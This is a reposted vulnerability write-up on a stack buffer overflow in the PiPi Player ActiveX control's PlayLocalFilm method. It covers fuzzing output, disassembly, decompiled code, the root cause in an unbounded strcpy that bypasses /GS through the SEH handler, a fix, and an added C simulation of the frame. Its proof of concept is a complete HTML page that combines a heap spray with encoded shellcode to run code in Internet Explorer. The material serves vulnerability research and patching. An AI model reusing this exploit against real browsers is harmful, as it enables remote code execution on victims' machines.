PiPi Player (皮皮播放器) ActiveX Control BOF Vulnerability

Posted: 2014-3-12 16:31

News link: http://www.2cto.com/Article/201403/284122.html
News date: 2014-03-08
News body: PiPi Player ActiveX Control BOF Vulnerability
A generic bug class, found by fuzzing.
1. Download the latest PiPi Player and fuzz its control with COMRaider.
The test case COMRaider generated (a .wsf job that instantiates the control by CLSID and calls PlayLocalFilm with a 6164-byte string of "A"):
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:A74BF134-5213-46B5-AF36-CE1888315DC7' id='target' />
<script language='vbscript'>
'File Generated by COMRaider v0.0.134 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\pipi\PIPIWebPlayer.ocx"
prototype = "Sub PlayLocalFilm ( ByVal lpFilmName As String )"
memberName = "PlayLocalFilm"
progid = "PIPIWebPlayerLib.PIPIWebPlayerCtrl"
argCount = 1
arg1=String(6164, "A")
target.PlayLocalFilm arg1
</script></job></package>
COMRaider's results list shows the exception: the SEH chain has been overwritten with 41414141, a textbook stack BOF. Note that the access violation is not raised by the strcpy itself but in a callee two calls deep (MOV EAX,[EAX+4]); the frame at PIPIWebPlayer.15F1B9E is the vulnerable function, and its return address is already 41414141. The corrupted stack is first tripped over by that callee, and the resulting exception is then dispatched through the overwritten SEH handler.
Exception Code: ACCESS_VIOLATION
Disasm: 15B7DDF MOV EAX,[EAX+4] (PIPIWebPlayer.DLL)
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
PIPIWebPlayer.15B7DDF PIPIWebPlayer.15B6FEF
PIPIWebPlayer.15B6FEF PIPIWebPlayer.15F1B9E
PIPIWebPlayer.15F1B9E 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
2. Root cause
Immunity Debugger and IDA; the workflow is the same as in the previous article, so it is skipped here.
The vulnerable code in the disassembly. The COMRaider log, Immunity and IDA each show the module at a different load base (compare 15F1B9E, 01A91B9E and 67641AF0: the low 16 bits match), so match addresses across the three listings by their low bits:
01A91AF0 55 PUSH EBP
01A91AF1 8BEC MOV EBP,ESP
01A91AF3 6A FF PUSH -1
01A91AF5 68 48EAAD01 PUSH PIPIWebP.01ADEA48
01A91AFA 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
01A91B00 50 PUSH EAX
01A91B01 64:8925 00000000 MOV DWORD PTR FS:[0],ESP
01A91B08 81EC 68040000 SUB ESP,468
01A91B0E A1 0869AF01 MOV EAX,DWORD PTR DS:[1AF6908]
01A91B13 33C5 XOR EAX,EBP
01A91B15 8945 EC MOV DWORD PTR SS:[EBP-14],EAX
01A91B18 898D ACFBFFFF MOV DWORD PTR SS:[EBP-454],ECX
01A91B1E C745 FC 01000000 MOV DWORD PTR SS:[EBP-4],1
01A91B25 6A 08 PUSH 8
01A91B27 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B2D 81C1 90000000 ADD ECX,90
01A91B33 E8 6859FCFF CALL PIPIWebP.01A574A0
01A91B38 8B85 ACFBFFFF MOV EAX,DWORD PTR SS:[EBP-454]
01A91B3E 83B8 80050000 00 CMP DWORD PTR DS:[EAX+580],0
01A91B45 74 2A JE SHORT PIPIWebP.01A91B71
01A91B47 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B4D C781 84050000 00>MOV DWORD PTR DS:[ECX+584],0
01A91B57 6A 00 PUSH 0
01A91B59 68 60EA0000 PUSH 0EA60
01A91B5E 6A 14 PUSH 14
01A91B60 8B8D ACFBFFFF MOV ECX,DWORD PTR SS:[EBP-454]
01A91B66 81C1 90000000 ADD ECX,90
01A91B6C E8 FF58FCFF CALL PIPIWebP.01A57470
01A91B71 8B95 ACFBFFFF MOV EDX,DWORD PTR SS:[EBP-454]
01A91B77 C682 84040000 01 MOV BYTE PTR DS:[EDX+484],1
01A91B7E 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
01A91B81 E8 AA29FEFF CALL PIPIWebP.01A74530
01A91B86 50 PUSH EAX
01A91B87 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C]
01A91B8D 50 PUSH EAX
01A91B8E E8 F1A30400 CALL <JMP.&MSVCR71.strcpy>
01A91B93 83C4 08 ADD ESP,8
01A91B96 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
01A91B99 E8 4254FCFF CALL PIPIWebP.01A56FE0
01A91B9E 0FB6C8 MOVZX ECX,AL
01A91BA1 85C9 TEST ECX,ECX
01A91BA3 0F84 01010000 JE PIPIWebP.01A91CAA
01A91BA9 8B95 ACFBFFFF MOV EDX,DWORD PTR SS:[EBP-454]
01A91BAF 83BA 3C020000 00 CMP DWORD PTR DS:[EDX+23C],0
01A91BB6 0F84 EC000000 JE PIPIWebP.01A91CA8
01A91BBC 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C]
01A91BC2 50 PUSH EAX
.....
01A91B8E E8 F1A30400 CALL <JMP.&MSVCR71.strcpy>: the film name is copied into a fixed-size local at EBP-21C with no bounds check, which is the BOF. Two details of the prologue matter for exploitation. First, 01A91AF3..01A91B01 push an SEH registration record (handler PIPIWebP.01ADEA48) at EBP-C/EBP-8 and link it into FS:[0]. Second, 01A91B0E..01A91B15 store a /GS security cookie at EBP-14. Both sit above the buffer, so a long enough copy overwrites the cookie, the SEH record, the saved EBP, the return address and the stack arguments at EBP+8 and EBP+C in one pass. The cookie is only verified in the epilogue, which is never reached: the very next call, 01A91B99, is made with ECX = &arg at EBP+C (already 41414141), the callee faults on it, and the exception dispatcher calls the overwritten handler. That is why /GS does not stop this bug and why the COMRaider log shows the handler as 41414141.
Hex-Rays output for the same function. Note the local layout in the declarations: Source sits at bp-21Ch and the next local, Filename, at bp-114h, so Source is 0x108 (264) bytes, while the fuzz case passed 6164:
int __thiscall sub_67641AF0(void *this, char a2, int a3, int a4)
{
const char *v4; // eax@3
unsigned __int8 v5; // al@3
int v6; // ecx@3
const char *v8; // eax@17
int v9; // ecx@28
int v10; // ecx@30
char *v11; // [sp-14h] [bp-488h]@39
char *v12; // [sp-10h] [bp-484h]@39
int v13; // [sp-Ch] [bp-480h]@18
int v14; // [sp-8h] [bp-47Ch]@13
int v15; // [sp-4h] [bp-478h]@13
int v16; // [sp+0h] [bp-474h]@39
int v17; // [sp+4h] [bp-470h]@31
int v18; // [sp+8h] [bp-46Ch]@31
int v19; // [sp+Ch] [bp-468h]@28
int v20; // [sp+10h] [bp-464h]@28
int v21; // [sp+14h] [bp-460h]@26
int v22; // [sp+18h] [bp-45Ch]@13
int v23; // [sp+1Ch] [bp-458h]@7
int v24; // [sp+20h] [bp-454h]@1
char **v25; // [sp+24h] [bp-450h]@39
int *v26; // [sp+28h] [bp-44Ch]@31
int *v27; // [sp+2Ch] [bp-448h]@28
void *v28; // [sp+30h] [bp-444h]@25
int v29; // [sp+34h] [bp-440h]@28
int *v30; // [sp+38h] [bp-43Ch]@13
void *v31; // [sp+3Ch] [bp-438h]@9
void *v32; // [sp+40h] [bp-434h]@6
int v33; // [sp+44h] [bp-430h]@9
int v34; // [sp+48h] [bp-42Ch]@31
int v35; // [sp+4Ch] [bp-428h]@28
int v36; // [sp+50h] [bp-424h]@9
int v37; // [sp+54h] [bp-420h]@17
char Src; // [sp+58h] [bp-41Ch]@17
char Dir; // [sp+158h] [bp-31Ch]@17
char Source; // [sp+258h] [bp-21Ch]@3
char Filename; // [sp+360h] [bp-114h]@17
char Drive; // [sp+464h] [bp-10h]@17
int v43; // [sp+470h] [bp-4h]@1
v24 = (int)this;
v43 = 1;
sub_676074A0(8u);
if ( *(_DWORD *)(v24 + 1408) )
{
*(_DWORD *)(v24 + 1412) = 0;
sub_67607470(0x14u, 0xEA60u, 0);
}
*(_BYTE *)(v24 + 1156) = 1;
v4 = (const char *)unknown_libname_80(&a2);
strcpy(&Source, v4); // buffer overflow: Source is 264 bytes, v4 (the film name) is unbounded
v5 = sub_67606FE0(&a3);
v6 = v5;
if ( v5 )
{
if ( *(_DWORD *)(v24 + 572) && strcmp((const char *)(*(_DWORD *)(v24 + 572) + 4), &Source) )
{
v32 = operator new(0x620u);
LOBYTE(v43) = 2;
if ( v32 )
v23 = sub_6764F860(v32);
else
v23 = 0;
v33 = v23;
LOBYTE(v43) = 1;
v36 = v23;
strcpy((char *)(v23 + 4), &Source);
*(_DWORD *)(v23 + 1076) = 0;
v31 = *(void **)(v24 + 572);
operator delete(v31);
*(_DWORD *)(v24 + 572) = 0;
v6 = v36;
*(_DWORD *)(v24 + 572) = v36;
}
}
else
{
sub_67655450(v24 + 488);
}
if ( *(_DWORD *)(v24 + 1384) )
{
v15 = 0;
v14 = v6;
v30 = &v14;
v22 = sub_6761D410("BUTTON_FILMPLAYON");
sub_6764DC80(v14, v15);
}
if ( (unsigned __int8)sub_67606FE0(&a2) && (unsigned __int8)sub_67606FE0(&a3) )
{
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
unknown_libname_12(&a2);
LOBYTE(v43) = 3;
v15 = (int)&Src;
v14 = (int)&Filename;
v8 = (const char *)unknown_libname_80(&v37);
splitpath(v8, &Drive, &Dir, (char *)v14, (char *)v15);
unknown_libname_14(&Src);
if ( !(unsigned __int8)sub_67606FE0(&a3) )
{
v15 = (int)&Src;
v14 = a3;
v13 = (int)&Dir;
sub_67621A80((int)&v37, "%s%s%s%s.jfenc", (unsigned int)&Drive);
}
if ( *(_DWORD *)(v24 + 572) )
{
if ( !(unsigned __int8)sub_67606FE0(&a3) )
{
if ( (unsigned __int8)sub_67621AD0(0) )
{
v15 = *(_DWORD *)(v24 + 572) + 1036;
if ( sub_67606F90((unsigned __int8 *)v15) )
sub_67650200(v24);
}
}
}
if ( !*(_DWORD *)(v24 + 572) )
{
v28 = operator new(0x620u);
LOBYTE(v43) = 4;
if ( v28 )
v21 = sub_6764F860(v28);
else
v21 = 0;
v29 = v21;
LOBYTE(v43) = 3;
*(_DWORD *)(v24 + 572) = v21;
v15 = unknown_libname_80(&a2);
v14 = *(_DWORD *)(v24 + 572) + 4;
strcpy((char *)v14, (const char *)v15);
*(_DWORD *)(*(_DWORD *)(v24 + 572) + 1076) = a4;
v15 = unknown_libname_80(&a3);
v14 = *(_DWORD *)(v24 + 572) + 1036;
strcpy((char *)v14, (const char *)v15);
v15 = v9;
v27 = &v15;
v20 = sub_6761D410("TRACKBAR_FILMCTRL");
v19 = sub_67620D80(v15);
v35 = v19;
if ( !v19 )
{
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
sub_6765E090(0, -1);
if ( dword_676A5A60 )
{
v15 = v10;
v26 = &v15;
v18 = sub_6761D410("TRACKBAR_FILMCTRL");
v17 = sub_67620D80(v15);
v34 = v17;
if ( !v17 )
{
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
sub_6765E090(0, -1);
}
}
if ( *(_DWORD *)(v24 + 572) )
{
memset((void *)(v24 + 1196), 0, 0x54u);
v15 = *(_DWORD *)(v24 + 572) + 1036;
strcpy((char *)(v24 + 1196), (const char *)v15);
*(_DWORD *)(v24 + 1260) = *(_DWORD *)(*(_DWORD *)(v24 + 572) + 1028);
if ( *(_DWORD *)(v24 + 1192) )
{
v15 = -1;
v14 = *(_DWORD *)(v24 + 1192);
TerminateThread((HANDLE)v14, 0xFFFFFFFFu);
*(_DWORD *)(v24 + 1192) = 0;
}
*(_DWORD *)(v24 + 1192) = beginthread(sub_6764C7D0, 0, v24);
if ( *(_DWORD *)(v24 + 1192) == -1 )
*(_DWORD *)(v24 + 1192) = 0;
}
v15 = (int)&Src;
v14 = (int)&Filename;
v13 = (int)&Dir;
v12 = &Drive;
v11 = &Drive;
v25 = &v11;
v16 = unknown_libname_12(&v37);
sub_67642170((char)v11, (char)v12, v13, v14, (char *)v15);
LOBYTE(v43) = 1;
unknown_libname_13(&v37);
LOBYTE(v43) = 0;
unknown_libname_13(&a2);
v43 = -1;
return unknown_libname_13(&a3);
}
3. PoC
The simplest way to exploit an ActiveX overflow is a heap spray.
PoC:
<html>
<body>
<object classid='clsid:A74BF134-5213-46B5-AF36-CE1888315DC7' id="target"></object>
<script>
// calc.exe shellcode from the original post, %u-encoded as UTF-16 words
shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
// SkyLined-style heap spray: 200 blocks of about 0x50000 bytes (roughly 100 MB),
// each a 0x90 NOP sled ending in the shellcode, so that 0x0D0D0D0D lands in a sled
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
memory=new Array();
for( counter=0; counter<200; counter++)
memory[counter]= block + shellcode;
// Overflow: 1101 x 4 = 4404 characters of 0x0D. The control hands strcpy a narrow
// copy of the string, so the SEH record, return address and arguments all become
// 0x0D0D0D0D, which points into the sprayed heap
buffer='';
for( counter=0; counter<=1100; counter++)
buffer+=unescape("%0D%0D%0D%0D");
target.PlayLocalFilm(buffer);
</script>
</body>
</html>
On XP with IE7 this pops calc.exe.
Since it is a textbook BOF, a PoC that deals with ASLR and DEP is doable too, but that can wait for next time; too lazy.
Fix:
strcpy must check the length. Concretely: compare the length of lpFilmName against the 264-byte destination before copying (or use a bounded copy such as strcpy_s, or strncpy with explicit termination) and reject over-long names.
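As an added worked example (not code from the original article or from PiPi Player), here is a C model of the PlayLocalFilm frame built from the EBP-relative offsets in the disassembly and decompilation above. It reproduces the unbounded strcpy into the 264-byte Source local, reports which slots (cookie, SEH record, return address, arguments) a given input length clobbers, and sits next to the bounded copy that fixes the bug. The offsets are the page's; the starting cookie and return-address values, the 'A'-string builder and the little-endian host are assumptions.

```c
/* Added example, not code from the original post or from PiPi Player.
 * Models the PlayLocalFilm stack frame as the disassembly above lays it out
 * (EBP-relative offsets), simulates the unbounded strcpy into the 0x108-byte
 * Source local, and shows the bounded copy that fixes the bug.
 * Assumptions: cookie/return-address start values are placeholders, and the
 * host is little-endian like the x86 target. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame slots from the strcpy target (EBP-0x21C) upward. Every member is a
 * multiple of 4 bytes, so there is no padding and offsetof() is exactly the
 * payload offset at which a slot is reached. */
struct frame {
    char     source[0x108];   /* EBP-0x21C  strcpy destination, 264 bytes       */
    char     filename[0x100]; /* EBP-0x114  _splitpath fname buffer              */
    uint32_t cookie;          /* EBP-0x014  /GS cookie, checked only in epilogue */
    char     drive[4];        /* EBP-0x010  _splitpath drive buffer              */
    uint32_t seh_next;        /* EBP-0x00C  saved FS:[0]                         */
    uint32_t seh_handler;     /* EBP-0x008  handler pushed at 01A91AF5           */
    uint32_t trylevel;        /* EBP-0x004  EH state (v43 in the decompilation)  */
    uint32_t saved_ebp;       /* EBP+0x000                                       */
    uint32_t ret_addr;        /* EBP+0x004                                       */
    uint32_t arg_filmname;    /* EBP+0x008  lpFilmName (a2)                      */
    uint32_t arg_a3;          /* EBP+0x00C  used by the call at 01A91B99         */
    uint32_t arg_a4;          /* EBP+0x010                                       */
};

/* Non-NUL payload bytes needed to replace all four bytes of a slot. */
static size_t bytes_to_overwrite(size_t slot_off)
{
    return slot_off + sizeof(uint32_t);
}

/* The bug. strcpy() stops only at the source terminator. The copy is done
 * byte-wise over the whole frame object so the simulation stays defined
 * behaviour; the real strcpy has no cap and keeps writing up the stack.
 * Returns the number of bytes written, terminator included when it fits. */
static size_t vulnerable_copy(struct frame *f, const char *name)
{
    unsigned char *dst = (unsigned char *)f + offsetof(struct frame, source);
    size_t limit = sizeof *f - offsetof(struct frame, source);
    size_t i = 0;
    while (i < limit && name[i] != '\0') {
        dst[i] = (unsigned char)name[i];
        i++;
    }
    if (i < limit)
        dst[i++] = '\0';
    return i;
}

/* The fix. Measure the name against the destination size before copying and
 * reject anything that does not fit together with its terminator. */
static int hardened_copy(struct frame *f, const char *name)
{
    size_t n = 0;
    while (n < sizeof f->source && name[n] != '\0')
        n++;
    if (n >= sizeof f->source)
        return -1;                    /* no room for the NUL: reject */
    memcpy(f->source, name, n + 1);
    return 0;
}

/* A film name of n 'A' bytes, like the COMRaider case (6164). Assumed helper. */
static const char *a_string(size_t n)
{
    static char buf[8192];
    if (n > sizeof buf - 1)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* Fresh frame with what the prologue leaves behind, then the bad copy. */
static struct frame run_vulnerable(size_t a_count)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.cookie      = 0xCAFEF00Du;  /* placeholder for [1AF6908] ^ EBP      */
    f.seh_handler = 0x01ADEA48u;  /* PIPIWebP.01ADEA48 from the listing    */
    f.ret_addr    = 0x11223344u;  /* placeholder: caller's return address  */
    vulnerable_copy(&f, a_string(a_count));
    return f;
}

static int run_hardened(size_t a_count)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    return hardened_copy(&f, a_string(a_count));
}

int main(void)
{
    struct frame f = run_vulnerable(6164);
    printf("SEH handler at payload offset %zu; %zu bytes own it fully\n",
           offsetof(struct frame, seh_handler),
           bytes_to_overwrite(offsetof(struct frame, seh_handler)));
    printf("after 6164 'A's: cookie=%08x seh=%08x ret=%08x a3=%08x\n",
           (unsigned)f.cookie, (unsigned)f.seh_handler,
           (unsigned)f.ret_addr, (unsigned)f.arg_a3);
    printf("bounded copy: 6164 'A's -> %d, 263 'A's -> %d\n",
           run_hardened(6164), run_hardened(263));
    return 0;
}
```

Running it shows that 536 'A' bytes already replace all four bytes of the SEH handler, while 535 leave its high byte as the strcpy terminator (a partial overwrite), so both the 6164-byte fuzz case and the 4404-byte 0x0D buffer in the PoC sweep past everything in the frame. The bounded copy rejects both and accepts names of up to 263 characters.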